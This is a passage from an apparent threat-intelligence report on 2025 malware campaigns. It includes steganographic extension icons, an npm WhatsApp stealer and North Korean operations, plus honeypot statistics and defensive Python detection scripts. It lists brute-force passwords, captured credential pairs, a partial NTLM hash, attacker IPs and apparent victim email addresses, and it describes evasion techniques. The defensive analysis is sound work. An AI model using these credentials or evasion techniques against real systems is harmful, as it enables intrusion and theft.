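    capacity = width * height
    stream = len(payload).to_bytes(4, "little") + payload
    if len(stream) > capacity:
        raise ValueError("payload does not fit in the carrier")
    stream = stream.ljust(capacity, b"\x00")
    return b"".join(bytes((0x10, 0x20, b ^ key, 0xFF)) for b in stream)


PAYLOAD = b"constructed-sample-bytes-not-a-real-shellcode"
CARRIER = build_sample_carrier(PAYLOAD, 8, 8)          # 8x8 constructed carrier
BENIGN = bytes((0x80, 0x80, 0x80, 0xFF)) * 64           # flat grey image, nothing hidden

if __name__ == "__main__":
    print(extract_payload(CARRIER))
    print({k: round(v, 2) for k, v in channel_entropy(CARRIER).items()})
    print(looks_like_carrier(CARRIER), looks_like_carrier(BENIGN))
```

Against a real PNG retrieved during incident response, decode it to BGRA with an image library first; the entropy margin should be tuned on known-good images from the same source, since photographs carry genuine noise in every channel and the heuristic is meant to flag outliers for manual decoding, not to stand alone.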


Campaign: GhostPoster Firefox Extensions

Attribution: Unknown criminal actor (financially motivated - ad fraud, affiliate hijacking)
Confidence: HIGH
First Observed: September 2025
Status: MITIGATED (Mozilla removed extensions)

Summary: Koi Security uncovered 17 compromised Firefox extensions with 50,000+ combined downloads. Attackers use steganography to hide malicious JavaScript in extension icons.

Kill Chain Analysis:

| Phase | MITRE ATT&CK | Description |
|---|---|---|
| Delivery | T1189 Drive-by Compromise | User installs extension from Firefox Add-ons store |
| Installation | T1176 Browser Extensions | Malicious extension persists in browser |
| Defense Evasion | T1027.003 Steganography | Payload hidden in PNG icon after === marker |
| Defense Evasion | T1497 Sandbox Evasion | 48-hour dormancy, 10% activation probability |
| Collection | T1185 Browser Session Hijacking | Affiliate link hijacking, cookie manipulation |
| Impact | T1565 Data Manipulation | Security header stripping (CSP, X-Frame-Options), ad fraud |

Affected Extensions:

| Extension Name | Downloads | Status |
|---|---|---|
| Free VPN Forever | 16,000+ | Removed |
| screenshot-saved-easy | Unknown | Removed |
| weather-best-forecast | Unknown | Removed |
| google-translate-pro-extension | Unknown | Removed |
| dark-reader-for-ff | Unknown | Removed |

Remediation: Mozilla removed all extensions and updated automated detection systems.
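A triage check for the GhostPoster hiding place, as an added example that is not part of the original report or of Koi Security's or Mozilla's tooling: it walks a PNG icon chunk by chunk, verifies each chunk CRC, and reports any bytes that follow the IEND chunk, which a PNG decoder silently ignores but a script can read back. The report says the payload sits after a `===` marker; this example assumes the marker lives in that trailing region, and the two icons it inspects are constructed in the block (a valid 1x1 PNG, and the same PNG with a marker and a stand-in text appended).

```python
"""Triage a browser-extension icon PNG for data appended after the image, the
hiding place described for GhostPoster. The sample PNGs are constructed."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MARKER = b"==="  # separator reported for GhostPoster


def parse_chunks(data: bytes):
    """Walk the chunk list up to IEND.
    Returns ([(type, length, crc_ok), ...], offset of the first byte after IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("truncated chunk")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        crc_ok = zlib.crc32(ctype + body) == crc  # CRC covers type + data
        chunks.append((ctype.decode("ascii"), length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, pos
    raise ValueError("no IEND chunk")


def inspect_icon(data: bytes) -> dict:
    """Report anything a PNG decoder would silently ignore."""
    chunks, end = parse_chunks(data)
    trailer = data[end:]
    # Assumption: the marker sits in the trailing bytes and the payload follows it.
    marker_at = trailer.find(MARKER)
    return {
        "chunks": [c[0] for c in chunks],
        "bad_crc": [c[0] for c in chunks if not c[2]],
        "trailing_bytes": len(trailer),
        "marker_found": marker_at != -1,
        "hidden_payload": trailer[marker_at + len(MARKER):] if marker_at != -1 else b"",
        "suspicious": bool(trailer),  # any trailing data is worth a look, marker or not
    }


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def minimal_png() -> bytes:
    """A valid 1x1 RGBA PNG, used as the clean baseline."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8-bit, colour type 6 (RGBA)
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00\xff")  # filter byte 0 + one opaque black pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


CLEAN_ICON = minimal_png()
APPENDED = b"/* constructed stand-in for appended script text */"
TAINTED_ICON = CLEAN_ICON + MARKER + APPENDED

if __name__ == "__main__":
    for label, icon in (("clean", CLEAN_ICON), ("tainted", TAINTED_ICON)):
        print(label, inspect_icon(icon))
```

Run inspect_icon over every PNG inside an unpacked extension (.xpi files are zip archives); a non-zero trailing_bytes on an icon is the signal, and the marker check only tells you which variant of the trick you are looking at.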


Campaign: lotusbail npm Package (WhatsApp Stealer)

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: May 2025
Status: ACTIVE (npm removed package, but attacker access persists for infected users)

Summary: Koi Security discovered a malicious npm package with 56,000+ downloads. The package provides a functional WhatsApp API while simultaneously exfiltrating credentials to attacker infrastructure.

Technical Execution:

Phase 1: Developer Integration

  • Developer installs lotusbail for WhatsApp functionality
  • Attacker based the package on the legitimate Baileys library
  • Package provides real, working WhatsApp API functions

Phase 2: Credential Harvesting

  • Library hijacks 8-character device pairing code mechanism
  • Hardcoded pairing code adds attacker device as trusted endpoint
  • Library intercepts all messages in real-time
  • Library harvests contacts
  • Library steals credentials and AES-encrypts before exfiltration

Phase 3: Persistence

  • CRITICAL: Attacker’s linked device remains connected even after package removal

Anti-Analysis Capabilities:

  1. 27 infinite loop traps detect debugging tools
  2. Unicode variable manipulation obfuscation
  3. LZString compression
  4. Base-91 encoding
  5. AES encryption of exfiltrated data

CRITICAL REMEDIATION NOTE: Uninstalling the package does NOT remove attacker access. Victims must manually unlink ALL devices from WhatsApp settings.


Campaign: MacSync Stealer Evolution

Attribution: Criminal actor “Mentalpositive”
Confidence: HIGH
First Observed: April 2025 (as Mac.C); July 2025 (rebrand to MacSync)
Status: MITIGATED (Apple revoked certificate)

Summary: This macOS infostealer evolved to use signed and notarized Swift applications, bypassing Gatekeeper and XProtect. Jamf Threat Labs analyzed the evolution and documented new evasion techniques.

Technical Execution:

Phase 1: Distribution

  • Victim downloads zk-call-messenger-installer-3.9.2-lts.dmg
  • Source: zkcall.net/download
  • Attacker inflates DMG to 25.5MB with decoy PDFs

Phase 2: Gatekeeper Bypass

  • Legitimately signed and notarized Swift application
  • Initial app contains NO malware (passes all checks)
  • Gatekeeper and XProtect approve execution

Phase 3: Payload Retrieval

  • App performs internet connectivity check (sandbox evasion)
  • App retrieves encoded script from remote server
  • App decodes and executes script

Phase 4: Credential Theft

  • Exfiltrates iCloud Keychain credentials
  • Extracts browser passwords
  • Collects system metadata
  • Steals cryptocurrency wallet data
  • Go-based agent provides full C2 capability

Phase 5: Cleanup

  • Wipes scripts after execution
  • Removes temp files
  • Memory-only execution minimizes forensic artifacts

Remediation Status: Apple revoked the developer certificate after Jamf’s report.


Campaign: APT37 Artemis

Attribution: APT37 / Reaper / ScarCruft (North Korea, state-sponsored)
Confidence: HIGH
First Observed: October 2023 (C2 infrastructure); December 2025 (current campaign)
Status: ACTIVE

Summary: North Korean threat group APT37 targets South Korean academics, journalists, and policy experts via social engineering. Genians Security Center analyzed the campaign and attributed it to DPRK state actors.

Targeting: Individuals with expertise in:

  • North Korean affairs
  • Human rights issues
  • Korean peninsula policy

Technical Execution:

Phase 1: Social Engineering

  • Spearphishing email from “Korean TV program writer”
  • Proposes interview about North Korean affairs
  • Attachment: Malicious HWP (Hangul Word Processor) document

Phase 2: Initial Compromise

  • Victim opens HWP document and enables content
  • Malicious OLE object executes
  • Malware deploys files to temporary folder

Phase 3: DLL Side-Loading

  • Executes legitimate Microsoft Sysinternals utilities
  • Places malicious version.dll in same directory
  • Windows loads attacker DLL instead of legitimate library
  • Executables: vhelp.exe, mhelp.exe

Phase 4: Payload Decryption

  • Multi-stage XOR decryption
  • Loader activates final shellcode

Phase 5: RoKRAT Deployment

  • Data-stealing payload with full remote access capability

C2 Infrastructure:

| Platform | Region | Account | Registration |
|---|---|---|---|
| Yandex Cloud | Russia | tanessha.samuel | October 2023 |
| pCloud | Switzerland | tanessha.samuel | October 2023 |

Analyst Note: Geographic separation of C2 across Russia and Switzerland demonstrates deliberate tradecraft to complicate attribution and evade geographic blocking.


Campaign: DriverFixer0428 (Contagious Interview)

Attribution: Contagious Interview / DEV#POPPER (North Korea, state-sponsored)
Confidence: HIGH
First Observed: 2023 (campaign); December 2025 (current sample)
Status: PARTIALLY DISRUPTED (FBI seized BlockNovas domain, April 2025)

Summary: Security researchers attribute this macOS credential stealer to the North Korean Contagious Interview campaign.

Targeting: Software developers and cryptocurrency professionals seeking employment.

Technical Execution:

Phase 1: Social Engineering

  • Victim contacted for fake job interview
  • Request to install “VCam” or “CameraAccess” for video call
  • Malware delivered as required interview software

Phase 2: Credential Harvesting

  • OverlayWindowController creates fullscreen overlay
  • Overlay prevents interaction until credentials entered
  • Impersonates macOS system prompts
  • Impersonates Chrome permission dialogs

Phase 3: Sandbox Evasion

  • sysctlbyname API checks for VM
  • IOKit checks for virtualization
  • NSScreen checks for analysis environment
  • Static analysis: clearly malicious; Dynamic sandbox score: 4/10 “likely benign”

Phase 4: Exfiltration

  • Credentials sent to attacker via Dropbox API

Law Enforcement Action: FBI seized BlockNovas domain (April 2025).


Malware Inventory

| Malware | Type | Platform | Attribution | Notes |
|---|---|---|---|---|
| Webrat | Backdoor/RAT | Windows | Criminal | Fake GitHub exploits; crypto/credential theft; screen recording; keylogging |
| MacSync Stealer | Infostealer | macOS | Criminal (Mentalpositive) | Signed/notarized Swift apps; Go-based C2 agent |
| DriverFixer0428 | Credential Stealer | macOS | DPRK (Contagious Interview) | Fullscreen overlay; Dropbox exfil |
| Odyssey | Infostealer | Windows | Criminal | Credential theft |
| RUSTRIC / PYTRIC | Malware families | Cross-platform | Unknown | Extensive ATT&CK technique coverage |
| ShellcodeRunner | Dropper | Windows | Unknown | Multi-stage attack component |
| Abyss / Underground | Ransomware | Windows | Criminal | Newly tracked families |
| LummaC2 | Infostealer | Windows | Criminal | ClickFix/steganography delivery |
| Rhadamanthys | Infostealer | Windows | Criminal | ClickFix/steganography delivery |
| RoKRAT | RAT | Windows | DPRK (APT37) | Artemis campaign payload |

Technical Appendix: Honeypot Intelligence

Baysec Sensor Analysis (December 2025)

Data Source: Baysec Sensor cluster
Period: December 17-27, 2025 (11 days)
Total Events: 12.3M+ events
Risk Level: HIGH - Sustained

Top Threat Actors by Attack Volume

| Rank | Source IP | Country | Organization | Events | Primary Target | Comment |
|---|---|---|---|---|---|---|
| 1 | 159.195.63.33 | 🇩🇰 Denmark | DXC Technology | 364,336 | SMB/RDP | CVE-2020-0796 (SMBGhost) |
| 2 | 189.124.135.33 | 🇧🇷 Brazil | Alares Cabo | 312,299 | MSSQL (1433) | SQL Server 2022 targeting |
| 3 | 34.29.105.211 | 🇺🇸 USA | Google Cloud | 252,507 | Multi-service | CVE-2023-44487 (HTTP/2 Rapid Reset) + 11 others |
| 4 | 113.160.186.2 | 🇻🇳 Vietnam | VNPT | 229,560 | SMB | Compromised hospital |
| 5 | 41.35.41.90 | 🇪🇬 Egypt | TE Data | 186,396 | SMB | - |
| 6 | 23.30.86.197 | 🇺🇸 USA | Comcast (Houston) | 166,823 | Mixed | Residential IP |
| 7 | 191.6.143.142 | 🇧🇷 Brazil | Claro | 146,204 | SMB | - |
| 8 | 197.43.35.230 | 🇪🇬 Egypt | TE Data | 142,845 | Mixed | - |
| 9 | 85.175.217.90 | 🇷🇺 Russia | Rostelecom (Krasnodar) | 129,360 | Mixed | - |

Primary Threat: 159.195.63.33 (DXC Technology, Denmark) is the top attacking IP with 364K+ events targeting SMB/RDP services, exploiting CVE-2020-0796 (SMBGhost).

SMB Bruteforce Campaign Analysis (Port 445)

Attack Volume: PRIMARY ATTACK VECTOR

| Rank | Attacker IP | Country | SMB Events | Technique |
|---|---|---|---|---|
| 1 | 189.124.135.33 | 🇧🇷 Brazil | 138,692 | NTLM brute force |
| 2 | 113.160.186.2 | 🇻🇳 Vietnam | 103,889 | SMB1/SMB2 negotiation |
| 3 | 41.35.41.90 | 🇪🇬 Egypt | 82,773 | IPC$ enumeration |
| 4 | 191.6.143.142 | 🇧🇷 Brazil | 64,917 | Credential stuffing |

SMB Attack Techniques Observed by Baysec:

  • SMB1/SMB2 protocol negotiation (downgrade attacks)
  • NTLM authentication brute force
  • IPC$ share enumeration (\\192.168.56.20\IPC$, \\192.168.1.1\IPC$)
  • STATUS_ACCESS_DENIED (0xc0000022) response harvesting
  • STATUS_MORE_PROCESSING_REQUIRED (0xc0000016) exploitation

Legacy Systems Targeted: Honeypot responses show attackers probing for Windows Server 2003 3790 Service Pack 2 - indicating searches for EOL/unpatched systems.

MSSQL Attack Patterns (Port 1433)

Concentrated Attack Source: IP range 185.242.246.* (coordinated scanning/exploitation)

Attack Techniques:

  • Port 1433 scanning and connection attempts
  • Database credential brute forcing (sa, admin accounts)
  • TDS protocol exploitation attempts
  • SQL Server version fingerprinting

Primary Attacker: 189.124.135.33 (Brazil) running Microsoft SQL Server 2022 GDR (16.0.1121.0) - attackers likely use this compromised database server for attacks.

SSH Bruteforce Analysis (Port 22)

Data Source: Baysec SSH honeypot
Total Events: 366,000+ authentication attempts (December 2025)
Successful Logins (honeypot): 1,401+ events
MITRE ATT&CK: T1110.001 - Brute Force: Password Guessing, T1110.003 - Password Spraying

Top 10 Usernames Attempted:

| Rank | Username | Count | % of Total | Notes |
|---|---|---|---|---|
| 1 | root | 34,327 | 9.4% | Linux/Unix superuser |
| 2 | sol | 3,569 | 1.0% | Cryptocurrency (Solana) |
| 3 | admin | 3,543 | 1.0% | Generic admin |
| 4 | solana | 2,156 | 0.6% | Cryptocurrency |
| 5 | user | 2,013 | 0.5% | Generic user |
| 6 | test | 1,884 | 0.5% | Test accounts |
| 7 | solv | 1,742 | 0.5% | Solana validator |
| 8 | ubuntu | 1,655 | 0.5% | Ubuntu default |
| 9 | oracle | 1,600 | 0.4% | Database service |
| 10 | postgres | 1,322 | 0.4% | PostgreSQL |

Top 10 Passwords Attempted:

| Rank | Password | Count | % of Total | Pattern |
|---|---|---|---|---|
| 1 | 123456 | 375 | 5.11% | Sequential |
| 2 | password | 279 | 3.80% | Dictionary |
| 3 | 12345 | 254 | 3.46% | Sequential |
| 4 | 123 | 174 | 2.37% | Sequential |
| 5 | 12345678 | 166 | 2.26% | Sequential |
| 6 | 345gs5662d34 | 162 | 2.21% | Mirai botnet |
| 7 | 123456789 | 158 | 2.15% | Sequential |
| 8 | 3245gs5662d34 | 157 | 2.14% | Mirai botnet |
| 9 | 123123 | 120 | 1.63% | Repeating |
| 10 | 1234 | 117 | 1.59% | Sequential |

Successful Credential Pairs (Honeypot Captures):

| Username | Password | Source IP | Country |
|---|---|---|---|
| root | 1234 | 167.71.10.33 | 🇳🇱 Netherlands |
| support | support2009 | 122.187.227.145 | 🇮🇳 India |
| root | 123456 | 121.166.191.164 | 🇰🇷 South Korea |
| demo | test | 211.24.41.44 | 🇲🇾 Malaysia |
| root | ashok123 | 202.8.127.134 | 🇮🇳 India |
| root | changeme | 196.61.37.18 | 🇬🇭 Ghana |
| user | user2019 | 31.173.0.26 | 🇷🇺 Russia |

Analyst Notes:

  • Cryptocurrency targeting: the sol, solana and solv (validator) usernames show heavy targeting of Solana infrastructure, with attackers hunting for validator nodes to steal funds
  • Service accounts: postgres and oracle show targeting of database infrastructure
  • Mirai signatures: the 345gs5662d34 username/password pair among the password attempts indicates active Mirai botnet scanning for IoT devices

SMB Attack Analysis - NTLMv2-SSP Authentication Capture

Data Source: Baysec Windows honeypot
Total Authentication Attempts: Baysec honeypot captured 1,447,000+ SMB authentication events (December 2025)
Intelligence: Attackers attempting SMB authentication send NTLMv2-SSP credentials to the honeypot, revealing their usernames, domains, and crackable password hashes.
MITRE ATT&CK: T1021.002 - SMB/Windows Admin Shares

Top 10 Usernames in NTLM Captures:

| Username | Count | Origin | Risk Level |
|---|---|---|---|
| Administrator | 97,529 | Windows default | CRITICAL |
| \\ (null/blank) | 79,211 | Anonymous auth | HIGH |
| admin | 61,455 | Common admin | HIGH |
| User | 52,094 | Generic | MEDIUM |
| for | 50,126 | Malformed request | MEDIUM |
| accounts | 49,870 | Targeted enum | HIGH |
| DefaultAccount | 16,629 | Windows 10+ | MEDIUM |
| ѓ®бвм / Ђ¤¬Ё­Ёбва в®а (Cyrillic) | 15,400+ | 🇷🇺 Russian (corrupted encoding) | HIGH |
| WDAGUtilityAccount | 12,818 | Windows Defender AG | LOW |
| hp | 10,476 | HP device default | MEDIUM |

Top 10 Attacking IPs for NTLM Capture:

| IP Address | Hash Count | Country | ASN/ISP |
|---|---|---|---|
| 189.124.135.33 | 71,594 | 🇧🇷 Brazil | Telefônica Brasil |
| 113.160.186.2 | 57,198 | 🇻🇳 Vietnam | VNPT (Hospital) |
| 41.35.41.90 | 41,033 | 🇪🇬 Egypt | TE Data |
| 85.175.217.90 | 34,368 | 🇷🇺 Russia | Beeline |
| 168.149.46.165 | 34,285 | 🇺🇸 USA | Microsoft |
| 197.43.35.230 | 31,001 | 🇪🇬 Egypt | TE Data |
| 191.6.143.142 | 30,822 | 🇧🇷 Brazil | Claro S.A. |
| 213.177.102.89 | 27,830 | 🇷🇺 Russia | JSC Rostelecom |
| 41.33.252.147 | 26,327 | 🇪🇬 Egypt | TE Data |
| 194.158.193.22 | 25,575 | 🇧🇾 Belarus | Beltelecom |

Sample Captured Hash (attacker-sourced):

Isaac:::f020e5b9c858043a:4A91B24B9B69CDFDC5988050076DB8BC:0101000000000000003F7EA04F6FDC01...

Intelligence Value: Windows honeypot captures NTLM hashes that attackers inadvertently send when attempting to authenticate. These are attacker credentials - revealing usernames, domain configurations, and potentially crackable passwords captured from threat actor infrastructure.


Persistent Threat Sources: Egypt & Russia Deep Dive

Assessment: IPs from Egypt and Russia represent persistent, high-volume threat sources across multiple attack vectors. Both show sustained activity throughout December 2025 with distinct operational patterns.

🇪🇬 Egyptian IPs Threat Assessment
| Metric | Value |
|---|---|
| Total Attack Volume | 2,437,000+ events |
| Primary Protocol | SMB (TCP/445) |
| Secondary | NTLM credential harvesting |
| SSH Activity | Minimal |
| Primary ISP | TE Data (Telecom Egypt) |

Top Egyptian Attacking IPs:

| IP Address | Events | Attack Type | ASN |
|---|---|---|---|
| 41.35.41.90 | 186,396 | SMB brute force, NTLM capture | TE-AS |
| 197.43.35.230 | 142,845 | Mixed protocol | TE-AS |
| 41.33.252.147 | 11,654 | NTLM hash harvesting | TE-AS |

Top Egyptian Usernames Captured (SMB/NTLM):

| Username | Count |
|---|---|
| Administrator | 48,019 |
| moh | 2,051 |
| Isaac | 1,924 |
| Fady | 1,924 |
| managsaied | 1,235 |
| alaa | 1,207 |
| mohamed | 983 |
| Ahmed | 816 |
| norhan | 816 |
| salma | 810 |
| Hassan | 714 |
| Khaled | 713 |

Operational Pattern: Egyptian IPs focus exclusively on Windows/SMB environments. No SSH activity observed. Targeting suggests Windows Active Directory credential harvesting for lateral movement or resale.

🇷🇺 Russian IPs Threat Assessment
| Metric | Value |
|---|---|
| Total Attack Volume | 1,103,000+ events |
| Primary Protocols | SSH, SMB, NTLM, General TCP |
| Attack Style | Multi-vector, persistent |
| Primary ISPs | Rostelecom, Selectel, Beeline |

Top Russian Attacking IPs:

| IP Address | Events | Attack Type | ASN |
|---|---|---|---|
| 213.177.102.89 | 20,220 | SMB, SSH, Mixed | JSC Rostelecom |
| 185.22.24.175 | 14,666 | SMB, SSH, Mixed | Selectel |
| 82.204.234.110 | 12,502 | SMB, SSH, NTLM | PJSC Rostelecom |
| 91.135.146.163 | 10,116 | SMB, SSH, Mixed | JSC RTComm.RU |
| 87.76.12.43 | 6,638 | SMB, SSH, Mixed | JSC Rostelecom |
| 92.38.31.29 | 6,501 | SMB, SSH, Mixed | Selectel |
| 94.141.60.92 | 5,017 | SMB, SSH, Mixed | JSC Rostelecom |
| 95.70.94.177 | 4,988 | SMB, SSH, Mixed | JSC Rostelecom |

Top Russian Usernames Captured (SMB/NTLM):

| Username | Count | Analysis |
|---|---|---|
| Nasyy | 1,849 | Russian nickname |
| progadmin | 1,848 | “Program Admin” - service account |
| Admin | 1,617 | Generic admin |
| Sergey | 462 | Russian name (Сергей) |
| USR1CV8 | 462 | 1C:Enterprise user - Russian ERP |
| marina | 462 | Russian name (Марина) |
| operatorent | 462 | “Enterprise Operator” |
| aleksey | 461 | Russian name (Алексей) |
| formozasvc | 461 | Service account |
| artem | 460 | Russian name (Артём) |
| yula | 460 | Russian name (Юля) |
| igor | 459 | Russian name (Игорь) |

Cyrillic Username Analysis:

| Raw Capture | Decoded (Windows-1251) | Count | Meaning |
|---|---|---|---|
| ѓ®бвм | Гость | 15,441 | Guest |
| Ђ¤¬Ё­Ёбва в®а | Администратор | 15,182 | Administrator |
| ЃгеЈ «вҐаЁп | Бухгалтерия | 1,102 | Accounting Dept |
| 的使用者帳戶 | (Chinese) | 2,494 | User Account |
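The raw strings above are what you get when cp866 (DOS/OEM Cyrillic) bytes are decoded as Windows-1251, so the repair is to re-encode with the codec the logger used and decode with the codec the sender used. The following is an added example, not Baysec's tooling; the candidate codec pairs and the "all letters Cyrillic" acceptance test are its own assumptions.

```python
"""Repair Cyrillic usernames logged as mojibake, e.g. "ѓ®бвм" -> "Гость".

Added example, not Baysec's code. The raw strings in the NTLM capture table are cp866
bytes that a logger decoded as Windows-1251; encoding with the logger's codec and
decoding with the sender's codec recovers the original name. The pairs tried below and
the acceptance test are assumptions of this example.
"""
import unicodedata
from typing import Optional, Tuple

# (codec the logger decoded with, codec the sender actually used), tried in order.
CANDIDATE_PAIRS = [
    ("cp1251", "cp866"),    # OEM Cyrillic misread as ANSI Cyrillic: the case in the table
    ("latin-1", "cp1251"),  # ANSI Cyrillic misread as Latin-1
    ("latin-1", "utf-8"),   # UTF-8 misread as Latin-1
]


def looks_like_cyrillic(text: str) -> bool:
    """True when the text contains at least one letter and every letter is Cyrillic."""
    seen_letter = False
    for ch in text:
        if ch.isspace() or ch.isdigit() or ch in "-_.":
            continue
        if ch.isalpha() and "CYRILLIC" in unicodedata.name(ch, ""):
            seen_letter = True
            continue
        return False  # a symbol such as "®" or "¤", or a non-Cyrillic letter
    return seen_letter


def repair_mojibake(raw: str) -> Tuple[str, Optional[str]]:
    """Return (repaired_text, "<sender codec> misread as <logger codec>") or (raw, None).

    Already-clean Cyrillic (e.g. "Сергей") and plain ASCII names come back unchanged.
    """
    if looks_like_cyrillic(raw):
        return raw, None
    for logged_as, sent_as in CANDIDATE_PAIRS:
        try:
            candidate = raw.encode(logged_as).decode(sent_as)
        except UnicodeError:
            continue  # raw cannot be expressed in that codec, so this pair does not apply
        if looks_like_cyrillic(candidate):
            return candidate, f"{sent_as} misread as {logged_as}"
    return raw, None


def repair_capture(rows):
    """Apply the repair to (raw_username, count) rows from an NTLM capture."""
    repaired = []
    for raw, count in rows:
        decoded, how = repair_mojibake(raw)
        repaired.append({"raw": raw, "decoded": decoded, "count": count, "encoding": how})
    return repaired


# Constructed sample rows: the three Russian entries from the table above, with the
# soft hyphen (\xad) and non-breaking space (\xa0) that the rendered page hides written out.
SAMPLE_ROWS = [
    ("ѓ®бвм", 15441),
    ("Ђ¤¬Ё\xadЁбва\xa0в®а", 15182),
    ("ЃгеЈ\xa0«вҐаЁп", 1102),
    ("Administrator", 97529),
]

if __name__ == "__main__":
    for row in repair_capture(SAMPLE_ROWS):
        print(f"{row['raw']!r:32} -> {row['decoded']!r:20} ({row['count']}, {row['encoding']})")
```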

Operational Pattern: Russian IPs demonstrate multi-protocol capabilities - attacking SSH, SMB, and web services simultaneously. The scale (20,000+ events from single IPs) and persistence suggest organized campaigns rather than opportunistic scanning.

Key Finding: Russian and Egyptian IPs are major persistent threat sources. Russian IPs show sophisticated multi-vector capabilities while Egyptian ones focus exclusively on Windows credential harvesting. Both warrant enhanced monitoring and blocking.


Targeted Services Summary

| Port | Service | Activity Level | Attack Type |
|---|---|---|---|
| 445 | SMB | CRITICAL | NTLM brute force, share enum |
| 1433 | MSSQL | VERY HIGH | Credential brute force |
| 3389 | RDP | HIGH | Authentication attacks |
| 25 | SMTP | HIGH | Open relay abuse, credential brute force |
| 22 | SSH | HIGH | Credential stuffing |
| 5985/5986 | WinRM | MEDIUM | Remote execution |
| 389 | LDAP | MEDIUM | Directory enumeration |
| 53 | DNS | MEDIUM | Zone enumeration, tunneling |

SMTP Honeypot Analysis (Port 25)

Data Source: Baysec SMTP honeypot
Period: December 2025
Total Events: 2,582
Risk Level: HIGH - Threat actors actively attempt to abuse SMTP for phishing distribution

Baysec SMTP honeypot captured active attempts to abuse open mail relays for phishing and spam distribution. Attackers probe for misconfigured mail servers to distribute malicious emails without attribution.

Top SMTP Attackers
| Source IP | Country | Events | Activity |
|---|---|---|---|
| 103.39.64.54 | 🇮🇳 India | 1,095 | AUTH LOGIN brute force |
| 45.144.212.19 | Unknown | 1,038 | AUTH LOGIN brute force |
| 45.144.212.238 | Unknown | 66 | AUTH LOGIN brute force |
| 78.153.140.207 | 🇷🇺 Russia | 49 | Phishing distribution attempt |
| 87.251.78.220 | 🇷🇺 Russia | 17 | Open relay testing, phishing |

Observed Attack Patterns

1. Credential Brute Force (AUTH LOGIN)

EHLO User
AUTH LOGIN
[Base64 encoded credentials]
QUIT

Primary attackers: 103.39.64.54, 45.144.212.19 - high-volume automated credential stuffing against SMTP authentication.

2. Phishing Distribution Attempts

| Attacker IP | From Address | Target | Campaign Type |
|---|---|---|---|
| 87.251.78.220 | accounts@globalfinancesolutions.com | buddum119@hotmail.com | Financial phishing |
| 77.83.39.209 | dpr@priv8shop.com | davebruce06@outlook.com | Unknown |
| 102.211.42.66 | office@cryptoyieldx.com | cryptoyieldx@protonmail.com | Cryptocurrency scam |
| 34.79.203.164 | info@pcsprojectmanager.com | info@msthardware.ca | Business impersonation |

3. Open Relay Testing

Multiple IPs from 158.94.x.x, 178.16.x.x, 185.169.x.x (Railnet LLC infrastructure) testing relay capabilities with spameri@tiscali.it sender - coordinated open relay reconnaissance.

4. Security Scanner Traffic

Legitimate scanner traffic excluded: Censys, Palo Alto Cortex Xpanse, cypex.ai, Reposify - reconnaissance traffic, not malicious.

Phishing Infrastructure Indicators
| Indicator | Type | Context |
|---|---|---|
| accounts@globalfinancesolutions.com | Sender | Financial phishing |
| office@cryptoyieldx.com | Sender | Crypto scam |
| dpr@priv8shop.com | Sender | Unknown campaign |
| 87.251.78.220 | IP | Russian phishing infrastructure |
| 102.211.42.66 | IP | African phishing node |

Assessment: Threat actors actively scan for and attempt to abuse misconfigured SMTP servers for phishing distribution. Organizations should ensure mail servers are not open relays and implement proper authentication (SPF, DKIM, DMARC).
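The attack patterns above (AUTH LOGIN brute force and open-relay testing) can be separated automatically from a honeypot transcript: the base64 tokens the client sends after each 334 challenge decode to the attempted username and password, and an unauthenticated MAIL FROM/RCPT TO pair aimed at a domain the server does not host is a relay probe. The following is an added example, not Baysec's honeypot code; the transcript format, the two sessions and the LOCAL_DOMAINS value are constructed.

```python
"""Triage SMTP honeypot sessions: decode AUTH LOGIN credentials and flag relay probes.

Added example, not Baysec's code. The transcript format ("SESSION <ip>" followed by "C:"
client and "S:" server lines) and both sessions are constructed; the AUTH LOGIN exchange
and the spameri@tiscali.it relay-test sender follow the patterns described in the text.
LOCAL_DOMAINS is an assumed list of domains this server legitimately accepts mail for.
"""
import base64
import re
from collections import Counter

LOCAL_DOMAINS = {"honeypot.example"}           # assumption: what this server should accept
RELAY_PROBE_SENDERS = {"spameri@tiscali.it"}  # relay-test sender noted in the section above

# Constructed transcript: an AUTH LOGIN brute-force session and an open-relay probe
# (TEST-NET source addresses, not real indicators).
SAMPLE_TRANSCRIPT = """\
SESSION 203.0.113.10
C: EHLO User
S: 250 honeypot.example
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: YWRtaW4=
S: 334 UGFzc3dvcmQ6
C: cGFzc3dvcmQxMjM=
S: 535 Authentication failed
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: cm9vdA==
S: 334 UGFzc3dvcmQ6
C: MTIzNDU2
S: 535 Authentication failed
C: QUIT
SESSION 198.51.100.7
C: EHLO relay-test
S: 250 honeypot.example
C: MAIL FROM:<spameri@tiscali.it>
S: 250 OK
C: RCPT TO:<spameri@tiscali.it>
S: 250 OK
C: QUIT
"""


def parse_sessions(transcript):
    """Split a transcript into [(source_ip, [(role, text), ...]), ...]."""
    sessions = []
    for line in transcript.splitlines():
        if line.startswith("SESSION "):
            sessions.append((line.split(" ", 1)[1].strip(), []))
        elif sessions and line[:2] in ("C:", "S:"):
            sessions[-1][1].append((line[0], line[2:].strip()))
    return sessions


def _b64(text):
    """Decode a base64 token; None when it is not valid base64."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeError):
        return None


def _address(text):
    """Extract the mailbox from 'MAIL FROM:<a@b>' / 'RCPT TO:<a@b>' (or the bare form)."""
    m = re.search(r"<([^>]*)>", text)
    return (m.group(1) if m else text.split(":", 1)[1]).strip().lower()


def triage_session(source_ip, lines):
    """Classify one session and collect the credentials and envelope it presented."""
    creds, mail_from, rcpt_to = [], [], []
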